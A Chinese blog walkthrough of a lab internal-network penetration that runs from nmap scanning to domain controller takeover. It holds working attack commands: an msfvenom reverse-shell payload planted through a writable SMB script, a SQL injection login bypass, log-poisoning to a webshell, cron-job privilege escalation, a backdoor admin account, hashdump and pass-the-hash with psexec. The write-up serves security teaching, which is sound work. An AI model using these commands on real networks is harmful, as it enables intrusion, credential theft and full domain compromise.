一個完整的內網滲透是什麼樣子的
0x00 前言
今天這篇文章將試圖呈現一個完整的內網滲透過程。文章略長,如果感興趣的話,請耐心閱讀!
0x01 案例分析
實驗環境:
-
目標環境:10.0.0.0/24, 10.0.1.0/24
-
攻擊主機:10.0.0.5 (Kali), 10.0.0.7 (Windows)
滲透過程:
基本的主機探測:
root@kali:~# nmap -sn 10.0.0.0/24 -oG online.txt
root@kali:~# cat online.txt | grep -i up
Host: 10.0.0.1 () Status: Up
Host: 10.0.0.2 () Status: Up
Host: 10.0.0.7 () Status: Up
Host: 10.0.0.9 () Status: Up
Host: 10.0.0.11 () Status: Up
Host: 10.0.0.5 () Status: Up
Nmap done at Wed May 30 06:10:17 2018 -- 256 IP addresses (6 hosts up) scanned in 1.83 seconds
任意選取其中的一個online的IP(如:10.0.0.9)進一步探測:
root@kali:~# nmap -sV -A -O 10.0.0.9
Starting Nmap 7.60 ( http://nmap.org ) at 2018-05-30 06:12 UTC
Nmap scan report for 10.0.0.9
Host is up (0.00048s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=Monitor
| Not valid before: 2018-05-27T07:03:14
|_Not valid after: 2018-11-26T07:03:14
|_ssl-date: 2018-05-30T06:14:01+00:00; +5s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
MAC Address: 0A:14:2C:84:E9:D2 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
...
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 4s
|_nbstat: NetBIOS name: MONITOR, NetBIOS user: <unknown>, NetBIOS MAC: 0a:14:2c:84:e9:d2 (unknown)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: Monitor
| NetBIOS computer name: MONITORx00
| Workgroup: WORKGROUPx00
|_ System time: 2018-05-30T06:14:01+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-05-30 06:14:01
|_ start_date: 2018-05-30 04:32:09
從以上探測結果可以發現該主機是Windows 2008 R2且開放了SMB和RDP,繼續探測:
root@kali:~# nmap --script=/usr/share/nmap/scripts/smb-enum-shares.nse -p 445 10.0.0.9
Starting Nmap 7.60 ( http://nmap.org ) at 2018-05-30 06:16 UTC
Nmap scan report for 10.0.0.9
Host is up (0.00019s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 0A:14:2C:84:E9:D2 (Unknown)
Host script results:
| smb-enum-shares:
| account_used: guest
| \10.0.0.9ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \10.0.0.9C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \10.0.0.9IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: READ
| Current user access: READ/WRITE
| \10.0.0.9Users:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
| Current user access: READ
| \10.0.0.9print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Anonymous access: <none>
| Current user access: READ
| \10.0.0.9share:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ/WRITE
此時,我們發現該主機存在一個可讀寫的share folder \10.0.0.9share:
root@kali:~# smbclient //10.0.0.9/share -N
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Wed May 30 06:16:59 2018
.. D 0 Wed May 30 06:16:59 2018
logs.txt A 39404 Wed May 30 06:19:20 2018
processMonitor.py A 576 Mon May 28 06:56:33 2018
7863807 blocks of size 4096. 1680653 blocks available
smb: >
為了進一步瞭解,登入我們用於滲透的另一臺Windows主機(10.0.0.7)。
發現,這個共享資料夾裡包含了一個定期監控執行程序的python指令碼。
import win32com.client
import datetime
def logging(context):
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") f = open('c:sharelogs.txt', 'a') f.write('{}: {}'.format(now,context)) f.close()def process_monitor():
wmi=win32com.client.GetObject('winmgmts:') for p in wmi.InstancesOf('win32_process'): logging("{}{}{}n".format(p.Name, p.Properties_('ProcessId'), int(p.Properties_('UserModeTime').Value)+int(p.Properties_('KernelModeTime').Value)))if name == "main":
process_monitor()
由於該資料夾可讀寫,我們可以生成並放置一個meterpreter的payload,然後修改該python指令碼來執行它,這樣我們就可以得到一個meterpreter session了。
[email protected]:/var/www/html# msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=4444 LHOST=10.0.0.5 -f exe > s.exe
修改python指令碼如下:
import win32com.client
import datetime
from subprocess import call
def logging(context):
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") f = open('c:sharelogs.txt', 'a') f.write('{}: {}'.format(now,context)) f.close()def process_monitor():
wmi=win32com.client.GetObject('winmgmts:') for p in wmi.InstancesOf('win32_process'): logging("{}{}{}n".format(p.Name, p.Properties_('ProcessId'), int(p.Properties_('UserModeTime').Value)+int(p.Properties_('KernelModeTime').Value)))if name == "main":
process_monitor() call(["c:shares.exe"])
幾分鐘後,我們順利地獲得了一個meterpreter session了。
msf exploit(handler) > sessions
Active sessions
===============
Id Name Type Information Connection
2 meterpreter x64/windows MONITORAdministrator @ MONITOR 10.0.0.5:4444 -> 10.0.0.9:49536 (10.0.0.9)
meterpreter > getuid
Server username: MONITORAdministrator
meterpreter > sysinfo
Computer : MONITOR
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Microsoft Teredo Tunneling Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::100:7f:fffe
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 13
============
Name : AWS PV Network Device #0
Hardware MAC : 0a:14:2c:84:e9:d2
MTU : 9001
IPv4 Address : 10.0.0.9
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::3053:3068:2bf6:272c
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 14
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a00:9
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 20
============
Name : AWS PV Network Device #1
Hardware MAC : 0a:17:b5:cb:d1:ac
MTU : 9001
IPv4 Address : 10.0.1.9
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::2189:c3cf:68e3:aab9
IPv6 Netmask : ffff:ffff:ffff:ffff::
同時,可以看出這個機器具有多個網絡卡且橫跨在2個網段中(10.0.0.9/24和10.0.1.9/24)。因此,我們也可以利用這個機器做跳板繼續滲透10.0.1.0/24這段裡的機器。
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.0.0.0/255.255.255.0
Local subnet: 10.0.1.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > route add 10.0.1.0 255.255.255.0 2
[*] Route added
msf exploit(handler) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
10.0.1.0 255.255.255.0 Session 2
[*] There are currently no IPv6 routes defined.
利用auxiliary/scanner/portscan/tcp去掃描10.0.1.0/24段,如下:
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 10.0.1.0/24
RHOSTS => 10.0.1.0/24
msf auxiliary(tcp) > set PORTS 22,80,3306,445,3389,139,1433
PORTS => 22,80,3306,445,3389,139,1433
msf auxiliary(tcp) > set threads 20
threads => 20
msf auxiliary(tcp) > run
[+] 10.0.1.7: - 10.0.1.7:445 - TCP OPEN
[+] 10.0.1.11: - 10.0.1.11:80 - TCP OPEN
[+] 10.0.1.9: - 10.0.1.9:445 - TCP OPEN
[+] 10.0.1.9: - 10.0.1.9:139 - TCP OPEN
[+] 10.0.1.11: - 10.0.1.11:22 - TCP OPEN
[+] 10.0.1.9: - 10.0.1.9:3389 - TCP OPEN
[+] 10.0.1.7: - 10.0.1.7:139 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:139 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:80 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:3389 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:3306 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:445 - TCP OPEN
我們任意選取其中的一臺機器(如:10.0.1.11),我們發現其開放了80和22埠。接下來,我們可以在session 2裡設定埠轉發,將攻擊機(10.0.0.5)上的8080埠轉發到目標機(10.0.1.7)上的80埠,方便我們後續的測試。
msf auxiliary(tcp) > sessions 2
[*] Starting interaction with 2...
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.1.11
[*] Local TCP relay created: :8080 <-> 10.0.1.11:80
meterpreter > portfwd list
Active Port Forwards
====================
Index Local Remote Direction
1 0.0.0.0:8080 10.0.1.11:80 Forward
1 total active port forwards.
這時,我們再次登入我們的Windows滲透機器(10.0.0.7)來檢視一下這是個什麼網站。
經過測試發現,這個登入功能存在SQL Injection,可以通過以下的使用者名稱和密碼登入:
username: admin
password: ' or '1'='1
經過觀察發現,這個網站應該直接本地檔案包含了web伺服器的access_log,因此我們可以想到利用檔案包含漏洞來生成一個webshell,具體步驟如下:
1. 傳送一個包含webshell程式碼的HTTP請求使其被寫入到access_log裡, 如一個僅包含上傳功能的php小馬
2. 訪問http://10.0.0.5:8080/admin.php來檔案包含access_log使其中的php程式碼被執行,從獲取一個具備上傳功能的php小馬
3. 訪問http://10.0.0.5:8080/upload.php並上傳一個功能齊全的PHP webshell
4. 訪問http://10.0.0.5:8080/shell.php並輸入密碼qwer,則成功地獲取了一個webshell
利用webshell提供的功能我們發現這只是一個用於執行web service的低許可權的使用者(daemon),那麼接下來我們需要解決的問題就是本地提權到root許可權。
如上圖,我們找到了一個777許可權的root使用者所擁有的cronjob檔案/etc/cron.hourly/clean_up_access_log。看起來這個指令碼似乎是用於定期清理access_log的。因此,我們似乎可以利用它來獲得一個root許可權的meterpreter shell。
首先,生成一個Linux的meterpreter payload並通過webshell上傳到目標主機上並新增執行許可權;
[email protected]:~# msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf > root.elf
system('chmod +x /opt/lampp/htdocs/root.elf');
接著,修改/etc/cron.hourly/clean_up_access_log使其可以執行我們上傳的payload並等待cronjob的下次執行;
system("echo '/opt/lampp/htdocs/root.elf' >> /etc/cron.hourly/clean_up_access_log");
最後,我們成功地在目標機器(10.0.1.11)上獲得了一個root許可權的meterpreter session,如下:
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf exploit(handler) > set RHOST 10.0.1.11
RHOST => 10.0.1.11
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Payload options (linux/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
LPORT 4444 yes The listen port
RHOST 10.0.1.11 no The target address
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > run
[*] Started bind handler
[*] Sending stage (802416 bytes) to 10.0.1.11
[*] Meterpreter session 4 opened (10.0.0.5-10.0.0.9:0 -> 10.0.1.11:4444) at 2018-05-30 15:23:26 +0000
meterpreter > sysinfo
Computer : 10.0.1.11
OS : Ubuntu 16.04 (Linux 4.4.0-1060-aws)
Architecture : x64
Meterpreter : x64/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > shell
Process 24394 created.
Channel 2 created.
id
uid=0(root) gid=0(root) groups=0(root)
ifconfig
eth0 Link encap:Ethernet HWaddr 0a:3a:ea:dc:8a:44
inet addr:10.0.1.11 Bcast:10.0.1.255 Mask:255.255.255.0 inet6 addr: fe80::83a:eaff:fedc:8a44/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1 RX packets:2703 errors:0 dropped:0 overruns:0 frame:0 TX packets:2973 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1105355 (1.1 MB) TX bytes:672700 (672.7 KB)lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:192 errors:0 dropped:0 overruns:0 frame:0 TX packets:192 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:14456 (14.4 KB) TX bytes:14456 (14.4 KB)ls -l /root
total 4
-rw------- 1 root root 84 May 25 10:10 readme.txt
利用上面獲得的root許可權的meterpreter session,我意外的發現了一個有趣的檔案/root/readme.txt,其中包含了一個遠端FTP(10.0.1.26)的口令和密碼。
cat /root/readme.txt
Credentials for FTP:
IP: 10.0.1.26
User: ftpadmin
Password: [email protected]
既然拿到了這個資訊,我們不妨再次探測一下我們的下一個目標(10.0.1.26)。
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 10.0.1.26
RHOSTS => 10.0.1.26
msf auxiliary(tcp) > set threads 50
threads => 50
msf auxiliary(tcp) > set PORTS 1-1025,1433,3306,3389
PORTS => 1-1025,1433,3306,3389
msf auxiliary(tcp) > run
[+] 10.0.1.26: - 10.0.1.26:21 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:80 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:139 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:135 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:445 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:443 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:3306 - TCP OPEN
[+] 10.0.1.26: - 10.0.1.26:3389 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
果不其然,目標機(10.0.1.26)確實存在一個FTP站點。進入上面獲得的session 2,在目標機10.0.0.9(10.0.1.9)上新增一個管理員賬號:
msf auxiliary(tcp) > sessions 2
[*] Starting interaction with 2...
meterpreter > shell
Process 1116 created.
Channel 147 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:Windowssystem32>net user test [email protected] /add
net user test [email protected] /add
The command completed successfully.
C:Windowssystem32>net localgroup administrators test /add
net localgroup administrators test /add
The command completed successfully.
C:Windowssystem32>
接著RDP到目標主機10.0.0.9(10.0.1.9)上,並嘗試使用已經獲取的口令登入。
結果顯示,我們成功地登入了該FTP站點,且具備讀寫許可權。另外,我們還發現該FTP為目標機10.0.1.26上的一個web站點的根目錄。因此,我們可以通過該FTP輕鬆地上傳一個webshell.php檔案,如下:
有了webshell我們便可以上傳一個meterpreter payload來獲取一個功能強大的meterpreter session了。
msf auxiliary(tcp) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(handler) > set RHOST 10.0.1.26
RHOST => 10.0.1.26
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 10.0.1.26 no The target address
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > run
[*] Started bind handler
[*] Sending stage (205379 bytes) to 10.0.1.26
[*] Meterpreter session 5 opened (10.0.0.5-10.0.0.9:0 -> 10.0.1.26:4444) at 2018-05-31 02:08:05 +0000
meterpreter > sysinfo
Computer : IT-MANAGE-PC
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : GBOX
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > ifconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Microsoft Teredo Tunneling Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::100:7f:fffe
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 13
============
Name : AWS PV Network Device #0
Hardware MAC : 0a:d9:e6:59:35:f0
MTU : 9001
IPv4 Address : 10.0.1.26
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::4171:a218:74ca:871f
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 14
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a00:11a
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
同時,我們發現目標機(10.0.1.26)是一個加入了GBOX域的機器,且DNS伺服器的IP是10.0.1.7:
meterpreter > shell
Process 4080 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:xampphtdocs>ipconfig -all
ipconfig -all
Windows IP Configuration
Host Name . . . . . . . . . . . . : IT-MANAGE-PC
Primary Dns Suffix . . . . . . . : gbox.com
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : us-west-2.ec2-utilities.amazonaws.com
ec2.internal us-east-1.ec2-utilities.amazonaws.com compute-1.internal us-west-2.compute.internal gbox.comEthernet adapter Local Area Connection 3:
Connection-specific DNS Suffix . : us-west-2.compute.internal
Description . . . . . . . . . . . : AWS PV Network Device #0
Physical Address. . . . . . . . . : 0A-D9-E6-59-35-F0
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::4171:a218:74ca:871f%13(Preferred)
IPv4 Address. . . . . . . . . . . : 10.0.1.26(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Wednesday, May 30, 2018 4:32:21 AM
Lease Expires . . . . . . . . . . : Thursday, May 31, 2018 3:02:46 AM
Default Gateway . . . . . . . . . : 10.0.1.1
DHCP Server . . . . . . . . . . . : 10.0.1.1
DHCPv6 IAID . . . . . . . . . . . : 302649180
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-22-9D-15-7F-0A-0F-5C-B0-05-5E
DNS Servers . . . . . . . . . . . : 10.0.1.7
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.us-west-2.compute.internal:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : us-west-2.compute.internal
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter Local Area Connection* 11:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
那麼接下來,我們的下一個目標就是IP為10.0.1.7的域控伺服器了。
經過一系列測試,發現目標機似乎只接受來自IP10.0.1.26(Session 5)的流量,因此我們需要先新增一個專門的路由使我們的攻擊機(10.0.0.5)流量可以抵達目標主機(10.0.1.7)。
msf exploit(psexec) > route add 10.0.1.7 255.255.255.255 5
msf exploit(psexec) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
10.0.1.0 255.255.255.0 Session 2
10.0.1.7 255.255.255.255 Session 5
[*] There are currently no IPv6 routes defined.
首先,蒐集利用hashdump命令收集一下主機10.0.1.26的所有密碼Hash:
msf exploit(handler) > sessions 5
[*] Starting interaction with 5...
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:616463a26de99900462a713770e806ab:::
gamebox:1001:aad3b435b51404eeaad3b435b51404ee:4ea29bdfa3e99248ce57c9f29d114a6f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
接著,我們可以嘗試使用Pass The Hash來測試一下我們的目標機(10.0.1.7),併成功地拿下了該域控伺服器。
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
RHOST 10.0.1.7 yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain gbox no The Windows domain to use for authentication
SMBPass aad3b435b51404eeaad3b435b51404ee:4ea29bdfa3e99248ce57c9f29d114a6f no The password for the specified username
SMBUser gamebox no The username to authenticate as
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 10.0.1.7 no The target address
Exploit target:
Id Name
0 Automatic
msf exploit(psexec) > run
[*] 10.0.1.7:445 - Connecting to the server...
[*] Started bind handler
[*] 10.0.1.7:445 - Authenticating to 10.0.1.7:445|gbox as user 'gamebox'...
[*] 10.0.1.7:445 - Selecting PowerShell target
[*] 10.0.1.7:445 - Executing the payload...
[+] 10.0.1.7:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (205379 bytes) to 10.0.1.7
[*] Meterpreter session 6 opened (10.0.0.5-1-10.0.0.9:0 -> 10.0.1.7:4444) at 2018-05-31 02:38:04 +0000
meterpreter > sysinfo
Computer : DC
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : GBOX
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > ifconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Microsoft Teredo Tunneling Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::100:7f:fffe
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 13
============
Name : AWS PV Network Device #0
Hardware MAC : 0a:ee:ba:e9:01:22
MTU : 9001
IPv4 Address : 10.0.1.7
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c907:5309:68a2:b1b8
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 14
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a00:107
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
至此,我們已經成功地拿下了所有實驗環境下的主機控制權限。
msf exploit(psexec) > sessions
Active sessions
===============
Id Name Type Information Connection
2 meterpreter x64/windows MONITORAdministrator @ MONITOR 10.0.0.5:4444 -> 10.0.0.9:51800 (10.0.0.9)
4 meterpreter x64/linux uid=0, gid=0, euid=0, egid=0 @ 10.0.1.11 10.0.0.5-10.0.0.9:0 -> 10.0.1.11:4444 (10.0.1.11)
5 meterpreter x64/windows NT AUTHORITYSYSTEM @ IT-MANAGE-PC 10.0.0.5-10.0.0.9:0 -> 10.0.1.26:4444 (10.0.1.26)
6 meterpreter x64/windows NT AUTHORITYSYSTEM @ DC 10.0.0.5-1-10.0.0.9:0 -> 10.0.1.7:4444 (10.0.1.7)
0x02 小結
本文重點介紹了一個相對完整的內網滲透過程(即:外網主機-內網主機-內網域內主機-內網域控伺服器)。當然,這只是個簡單的實驗環境,實際實戰中遇到的情況會比這複雜很多(比如:各種反病毒程式的bypass,內網反入侵系統的檢測的繞過等等),但是基本思路和方法都是類似和想通的。另外,因筆者水平有限,文中表達不當或者不正確的地方,也敬請諒解和指正。
需要網路安全學習影片,全套工具包、滲透測試書籍、src技術文件、應急響應、CTF、逆向等資源【點我領取】
- Web安全應急響應小記
- 網路安全之一個滲透測試小案例
- 滲透測試入門指南之小白該如何學習滲透?
- 網路安全學習:內網滲透案例,打破滲透瓶頸
- 審計挖掘之CNVD通用漏洞
- 你最想了解的紅隊實戰攻防技術,來了
- 網路安全小白學習路線,別拜師了,求人不如求己
- 檔案上傳繞過思路拓展
- CRLF、CSRF、SSRF攻擊與利用
- 帶你破解DDOS攻擊的原理
- 從零開始的SRC挖掘
- 漏洞挖掘的快樂你想象不到
- 網路安全證書合集系列
- 網路安全行業真的內捲了嗎?
- 一個完整的內網滲透是什麼樣子的
- 記一次PHP滲透測試實戰教程
- 總結分析元件化漏洞產生的原理
- 這是一次雞肋的程式碼審計
- 它來了!靶機滲透題目的一次實戰記錄
- 【網路安全】滲透工程師面試題總結大全